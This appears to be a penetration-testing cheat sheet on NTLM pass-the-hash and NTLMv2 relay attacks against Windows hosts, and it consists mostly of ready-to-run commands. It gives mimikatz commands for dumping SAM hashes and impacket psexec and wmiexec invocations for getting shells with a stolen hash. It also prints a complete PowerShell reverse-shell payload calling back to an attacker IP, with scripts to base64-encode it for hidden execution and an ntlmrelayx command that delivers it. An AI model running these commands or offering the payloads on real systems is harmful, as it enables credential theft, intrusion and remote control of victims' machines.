Passing Hash

Passing NTLM HASH

How to get the NTLM HASH

if you have access to machine and you local admin access use below commands to get the hash

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
...

mimikatz # lsadump::sam

Passing the NTLM HASH

Using SMBClient

This will help you get access to an smb share by using password hash discovered

smbclient \\\\192.168.50.212\\secrets -U UserName --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

Using Impacket-psexec

You will get a System Shell session on the victim machine

impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b UserName@192.168.1.2

Using Impacket-wmiexec

You will get the User Shell Session on the vectim machine

impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b UserName@192.168.1.2

Relaying NTLMv2 HASH

The idea is to get an NTLMv2 Hash and relay it to get shell access,
Steps include get a powershell reverseShell script and base64 encode it.

Step1: Get reverse Shell script

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Step2: base64 Encode it

You can use python script as below to base64 encode it

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.1.10",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

Or you can also use below bash 1 liner to base64 encode the command

echo -n '$client = New-Object System.Net.Sockets.TCPClient("192.168.1.10",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -f UTF-8 -t UTF-16LE | base64 -w0

Step3: Using Imapacket-ntlmrelayx to relay

Using below command your Kali machine will be ready to relay the NTLM hash that is gets

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.1.50 -c "powershell -enc <Base64_encoded_reverse_shell_Command>..."

-t : takes the IP where you want to relay this NTLMv2 Hash

Step4: Using nc to recieve shell

nc -nvlp 443

Step5: Get the NTLMv2 Hash to relay

From the command execution area try to access file share on your kali

dir \\192.168.1.10\test.txt

Passing NTLM HASH​

How to get the NTLM HASH​

Passing the NTLM HASH​

Using SMBClient​

Using Impacket-psexec​

Using Impacket-wmiexec​

Relaying NTLMv2 HASH​

Step1: Get reverse Shell script​

Step2: base64 Encode it​

Step3: Using Imapacket-ntlmrelayx to relay​

Step4: Using nc to recieve shell​

Step5: Get the NTLMv2 Hash to relay​